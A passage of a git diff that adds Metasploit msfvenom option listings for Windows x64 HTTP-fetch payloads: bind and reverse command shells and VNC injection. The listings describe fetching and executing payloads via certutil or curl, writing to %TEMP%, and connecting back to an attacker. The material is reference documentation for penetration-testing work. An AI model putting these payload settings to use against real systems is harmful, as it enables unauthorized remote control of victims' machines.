(deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-shell-bind_tcp_rc4.txt b/msfvenom/payload_options/cmd-windows-http-x64-shell-bind_tcp_rc4.txt new file mode 100644 index 0000000..222e3a5 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-shell-bind_tcp_rc4.txt @@ -0,0 +1,84 @@ + + Name: HTTP Fetch, Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm) + Module: payload/cmd/windows/http/x64/shell/bind_tcp_rc4 + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 123 + Rank: Normal + +Provided by: + Brendan Watters + sf + hdm + skape + mihi + max3raza + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME GLnwvbuI no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RC4PASSWORD msf yes Password to derive RC4 key from +RHOST no The target address + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Spawn a piped command shell (Windows x64) (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-shell-bind_tcp_uuid.txt b/msfvenom/payload_options/cmd-windows-http-x64-shell-bind_tcp_uuid.txt new file mode 100644 index 0000000..17ee22b --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-shell-bind_tcp_uuid.txt @@ -0,0 +1,79 @@ + + Name: HTTP Fetch, Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64) + Module: payload/cmd/windows/http/x64/shell/bind_tcp_uuid + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 131 + Rank: Normal + +Provided by: + Brendan Watters + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME PIgvnfZgroJm no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Spawn a piped command shell (Windows x64) (staged). + + Listen for a connection with UUID Support (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-shell-reverse_tcp.txt new file mode 100644 index 0000000..53dffb6 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-shell-reverse_tcp.txt @@ -0,0 +1,85 @@ + + Name: HTTP Fetch, Windows x64 Command Shell, Windows x64 Reverse TCP Stager + Module: payload/cmd/windows/http/x64/shell/reverse_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME LqWwxSXLoC no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Spawn a piped command shell (Windows x64) (staged). + + Connect back to the attacker (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-shell-reverse_tcp_rc4.txt b/msfvenom/payload_options/cmd-windows-http-x64-shell-reverse_tcp_rc4.txt new file mode 100644 index 0000000..0097b4c --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-shell-reverse_tcp_rc4.txt @@ -0,0 +1,91 @@ + + Name: HTTP Fetch, Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm) + Module: payload/cmd/windows/http/x64/shell/reverse_tcp_rc4 + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + sf + hdm + skape + mihi + max3raza + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME zQMoeUSRyZ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +RC4PASSWORD msf yes Password to derive RC4 key from + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Spawn a piped command shell (Windows x64) (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-shell-reverse_tcp_uuid.txt b/msfvenom/payload_options/cmd-windows-http-x64-shell-reverse_tcp_uuid.txt new file mode 100644 index 0000000..2a5e057 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-shell-reverse_tcp_uuid.txt @@ -0,0 +1,86 @@ + + Name: HTTP Fetch, Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64) + Module: payload/cmd/windows/http/x64/shell/reverse_tcp_uuid + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 129 + Rank: Normal + +Provided by: + Brendan Watters + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME yTLZJCRAVyZ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Spawn a piped command shell (Windows x64) (staged). + + Connect back to the attacker with UUID Support (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-shell_bind_tcp.txt new file mode 100644 index 0000000..1f5e595 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-shell_bind_tcp.txt @@ -0,0 +1,66 @@ + + Name: HTTP Fetch, Windows x64 Command Shell, Bind TCP Inline + Module: payload/cmd/windows/http/x64/shell_bind_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME CgAtbYIFbN no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Listen for a connection and spawn a command shell (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-shell_reverse_tcp.txt new file mode 100644 index 0000000..58a520a --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-shell_reverse_tcp.txt @@ -0,0 +1,73 @@ + + Name: HTTP Fetch, Windows x64 Command Shell, Reverse TCP Inline + Module: payload/cmd/windows/http/x64/shell_reverse_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 125 + Rank: Normal + +Provided by: + Brendan Watters + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME VoSqRFFys no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to attacker and spawn a command shell (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-vncinject-bind_ipv6_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-bind_ipv6_tcp.txt new file mode 100644 index 0000000..edb32bd --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-bind_ipv6_tcp.txt @@ -0,0 +1,78 @@ + + Name: HTTP Fetch, Windows x64 IPv6 Bind TCP Stager + Module: payload/cmd/windows/http/x64/vncinject/bind_ipv6_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 129 + Rank: Normal + +Provided by: + Brendan Watters + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +AUTOVNC true yes Automatically launch VNC viewer if present +DisableCourtesyShell true no Disables the Metasploit Courtesy shell +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME htamxvybZmX no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RHOST no The target address +VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy +VNCPORT 5900 yes The local port to use for the VNC proxy +ViewOnly true no Runs the viewer in view mode + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Listen for an IPv6 connection (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + DisableSessionTracking false no Disables the VNC payload from following the active session as users log in an out of the input desktop + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-vncinject-bind_ipv6_tcp_uuid.txt b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-bind_ipv6_tcp_uuid.txt new file mode 100644 index 0000000..b0db81e --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-bind_ipv6_tcp_uuid.txt @@ -0,0 +1,79 @@ + + Name: HTTP Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support + Module: payload/cmd/windows/http/x64/vncinject/bind_ipv6_tcp_uuid + Platform: Windows + Arch: cmd +Needs 